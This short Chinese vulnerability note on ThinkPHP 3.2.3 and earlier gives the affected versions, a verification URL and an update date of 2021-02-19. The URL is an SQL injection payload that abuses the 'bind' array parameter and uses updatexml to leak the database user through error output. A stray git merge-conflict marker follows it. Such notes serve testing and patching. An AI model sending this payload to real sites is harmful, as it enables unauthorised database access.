跳转至

Thinkphp

影响范围

Thinkphp <= 3.2.3

漏洞验证POC

/index.php/home/user?money[]=1123&user=liao&id[0]=bind&id[1]=0%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))
<<<<<<< HEAD

最后更新: 2021-02-19